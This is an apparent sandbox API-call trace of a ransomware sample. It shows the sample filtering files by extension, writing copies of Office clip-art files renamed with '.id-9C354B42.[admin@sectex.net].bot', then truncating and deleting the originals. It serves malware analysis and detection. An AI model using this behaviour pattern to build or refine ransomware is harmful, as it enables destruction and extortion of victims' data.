	[0164.359] lstrlenW (lpString=".zip") returned 4
	[0164.359] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.359] lstrlenW (lpString=".rar") returned 4
	[0164.359] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.359] lstrlenW (lpString=".bz2") returned 4
	[0164.359] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.359] lstrlenW (lpString=".7z") returned 3
	[0164.359] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.359] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF") returned 63
	[0164.359] lstrlenW (lpString=".dbf") returned 4
	[0164.360] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF") returned 63
	[0164.360] lstrlenW (lpString=".1cd") returned 4
	[0164.360] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.360] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151061.WMF") returned 63
	[0164.360] lstrlenW (lpString=".jpg") returned 4
	[0164.360] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.360] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0164.360] lstrlenW (lpString="J0151581.WMF") returned 12
	[0164.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151581.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.361] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=10752) returned 1
	[0164.361] CloseHandle (hObject=0x3d0) returned 1
	[0164.362] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151581.wmf")) returned 0x20
	[0164.362] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151581.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151581.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.362] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.362] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.362] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151581.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0164.363] GetLastError () returned 0x0
	[0164.363] ReadFile (in: hFile=0x3d0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x2a00, lpOverlapped=0x0) returned 1
	[0164.364] WriteFile (in: hFile=0x3a4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2a10, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2a10, lpOverlapped=0x0) returned 1
	[0164.365] ReadFile (in: hFile=0x3d0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.365] WriteFile (in: hFile=0x3a4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0164.366] SetEndOfFile (hFile=0x3a4) returned 1
	[0164.366] CloseHandle (hObject=0x3a4) returned 1
	[0164.366] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.366] SetEndOfFile (hFile=0x3d0) returned 1
	[0164.368] CloseHandle (hObject=0x3d0) returned 1
	[0164.368] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.369] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0151581.wmf")) returned 1
	[0164.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63
	[0164.377] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63
	[0164.377] lstrlenW (lpString=".doc") returned 4
	[0164.377] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.377] lstrlenW (lpString=".docx") returned 5
	[0164.378] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0164.378] lstrlenW (lpString=".pdf") returned 4
	[0164.378] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.378] lstrlenW (lpString=".xls") returned 4
	[0164.378] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.378] lstrlenW (lpString=".xlsx") returned 5
	[0164.378] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0164.378] lstrlenW (lpString=".ppt") returned 4
	[0164.378] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63
	[0164.378] lstrlenW (lpString=".zip") returned 4
	[0164.378] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.378] lstrlenW (lpString=".rar") returned 4
	[0164.378] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.378] lstrlenW (lpString=".bz2") returned 4
	[0164.378] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.378] lstrlenW (lpString=".7z") returned 3
	[0164.378] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63
	[0164.378] lstrlenW (lpString=".dbf") returned 4
	[0164.378] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63
	[0164.378] lstrlenW (lpString=".1cd") returned 4
	[0164.378] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63
	[0164.378] lstrlenW (lpString=".jpg") returned 4
	[0164.378] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63
	[0164.378] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63
	[0164.378] lstrlenW (lpString=".doc") returned 4
	[0164.378] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.378] lstrlenW (lpString=".docx") returned 5
	[0164.378] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1
	[0164.378] lstrlenW (lpString=".pdf") returned 4
	[0164.379] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.379] lstrlenW (lpString=".xls") returned 4
	[0164.379] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.379] lstrlenW (lpString=".xlsx") returned 5
	[0164.379] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1
	[0164.379] lstrlenW (lpString=".ppt") returned 4
	[0164.379] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63
	[0164.379] lstrlenW (lpString=".zip") returned 4
	[0164.379] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.379] lstrlenW (lpString=".rar") returned 4
	[0164.379] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.379] lstrlenW (lpString=".bz2") returned 4
	[0164.379] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.379] lstrlenW (lpString=".7z") returned 3
	[0164.379] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63
	[0164.379] lstrlenW (lpString=".dbf") returned 4
	[0164.379] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63
	[0164.379] lstrlenW (lpString=".1cd") returned 4
	[0164.379] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.379] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0151581.WMF") returned 63
	[0164.379] lstrlenW (lpString=".jpg") returned 4
	[0164.379] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.379] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0164.379] lstrlenW (lpString="J0152414.WMF") returned 12
	[0164.379] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152414.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.380] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=24844) returned 1
	[0164.380] CloseHandle (hObject=0x3d0) returned 1
	[0164.380] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152414.wmf")) returned 0x20
	[0164.380] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152414.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.380] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152414.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.381] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.381] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.381] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152414.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0164.382] GetLastError () returned 0x0
	[0164.382] ReadFile (in: hFile=0x3d0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x610c, lpOverlapped=0x0) returned 1
	[0164.596] WriteFile (in: hFile=0x3a4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x6110, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x6110, lpOverlapped=0x0) returned 1
	[0164.597] ReadFile (in: hFile=0x3d0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.597] WriteFile (in: hFile=0x3a4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0164.597] SetEndOfFile (hFile=0x3a4) returned 1
	[0164.597] CloseHandle (hObject=0x3a4) returned 1
	[0164.597] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.597] SetEndOfFile (hFile=0x3d0) returned 1
	[0164.600] CloseHandle (hObject=0x3d0) returned 1
	[0164.600] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.601] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152414.wmf")) returned 1
	[0164.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63
	[0164.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63
	[0164.602] lstrlenW (lpString=".doc") returned 4
	[0164.602] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.602] lstrlenW (lpString=".docx") returned 5
	[0164.602] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0164.602] lstrlenW (lpString=".pdf") returned 4
	[0164.602] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.602] lstrlenW (lpString=".xls") returned 4
	[0164.602] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.602] lstrlenW (lpString=".xlsx") returned 5
	[0164.602] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0164.602] lstrlenW (lpString=".ppt") returned 4
	[0164.602] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63
	[0164.602] lstrlenW (lpString=".zip") returned 4
	[0164.602] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.602] lstrlenW (lpString=".rar") returned 4
	[0164.602] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.602] lstrlenW (lpString=".bz2") returned 4
	[0164.602] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.602] lstrlenW (lpString=".7z") returned 3
	[0164.602] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63
	[0164.602] lstrlenW (lpString=".dbf") returned 4
	[0164.602] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.602] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63
	[0164.603] lstrlenW (lpString=".1cd") returned 4
	[0164.604] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63
	[0164.604] lstrlenW (lpString=".jpg") returned 4
	[0164.604] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63
	[0164.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63
	[0164.604] lstrlenW (lpString=".doc") returned 4
	[0164.604] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.604] lstrlenW (lpString=".docx") returned 5
	[0164.605] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0164.605] lstrlenW (lpString=".pdf") returned 4
	[0164.605] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.605] lstrlenW (lpString=".xls") returned 4
	[0164.605] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.605] lstrlenW (lpString=".xlsx") returned 5
	[0164.605] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0164.605] lstrlenW (lpString=".ppt") returned 4
	[0164.605] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63
	[0164.605] lstrlenW (lpString=".zip") returned 4
	[0164.605] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.605] lstrlenW (lpString=".rar") returned 4
	[0164.605] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.605] lstrlenW (lpString=".bz2") returned 4
	[0164.605] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.605] lstrlenW (lpString=".7z") returned 3
	[0164.605] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63
	[0164.605] lstrlenW (lpString=".dbf") returned 4
	[0164.605] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63
	[0164.605] lstrlenW (lpString=".1cd") returned 4
	[0164.605] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152414.WMF") returned 63
	[0164.605] lstrlenW (lpString=".jpg") returned 4
	[0164.605] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.605] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0164.606] lstrlenW (lpString="J0152436.WMF") returned 12
	[0164.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152436.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.606] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=11340) returned 1
	[0164.606] CloseHandle (hObject=0x3d0) returned 1
	[0164.606] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152436.wmf")) returned 0x20
	[0164.606] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152436.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0164.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152436.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0164.607] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.607] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.607] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152436.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0164.607] GetLastError () returned 0x0
	[0164.607] ReadFile (in: hFile=0x3d0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x2c4c, lpOverlapped=0x0) returned 1
	[0164.617] WriteFile (in: hFile=0x3a4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2c50, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2c50, lpOverlapped=0x0) returned 1
	[0164.618] ReadFile (in: hFile=0x3d0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0164.618] WriteFile (in: hFile=0x3a4, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0164.618] SetEndOfFile (hFile=0x3a4) returned 1
	[0164.619] CloseHandle (hObject=0x3a4) returned 1
	[0164.619] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0164.619] SetEndOfFile (hFile=0x3d0) returned 1
	[0164.621] CloseHandle (hObject=0x3d0) returned 1
	[0164.621] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0164.621] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152436.wmf")) returned 1
	[0164.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63
	[0164.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63
	[0164.622] lstrlenW (lpString=".doc") returned 4
	[0164.622] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.622] lstrlenW (lpString=".docx") returned 5
	[0164.622] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0164.622] lstrlenW (lpString=".pdf") returned 4
	[0164.622] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.622] lstrlenW (lpString=".xls") returned 4
	[0164.622] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.622] lstrlenW (lpString=".xlsx") returned 5
	[0164.622] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0164.622] lstrlenW (lpString=".ppt") returned 4
	[0164.622] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63
	[0164.622] lstrlenW (lpString=".zip") returned 4
	[0164.622] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.622] lstrlenW (lpString=".rar") returned 4
	[0164.622] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.622] lstrlenW (lpString=".bz2") returned 4
	[0164.622] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0164.622] lstrlenW (lpString=".7z") returned 3
	[0164.622] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0164.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63
	[0164.622] lstrlenW (lpString=".dbf") returned 4
	[0164.622] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0164.622] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63
	[0164.622] lstrlenW (lpString=".1cd") returned 4
	[0164.622] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0164.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63
	[0164.623] lstrlenW (lpString=".jpg") returned 4
	[0164.623] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0164.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63
	[0164.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63
	[0164.623] lstrlenW (lpString=".doc") returned 4
	[0164.623] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0164.623] lstrlenW (lpString=".docx") returned 5
	[0164.623] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0164.623] lstrlenW (lpString=".pdf") returned 4
	[0164.623] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0164.623] lstrlenW (lpString=".xls") returned 4
	[0164.623] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0164.623] lstrlenW (lpString=".xlsx") returned 5
	[0164.623] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0164.623] lstrlenW (lpString=".ppt") returned 4
	[0164.623] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0164.623] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152436.WMF") returned 63
	[0164.623] lstrlenW (lpString=".zip") returned 4
	[0164.623] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0164.623] lstrlenW (lpString=".rar") returned 4
	[0164.623] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0164.623] lstrlenW (lpString=".bz2") returned 4
	[0164.623] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
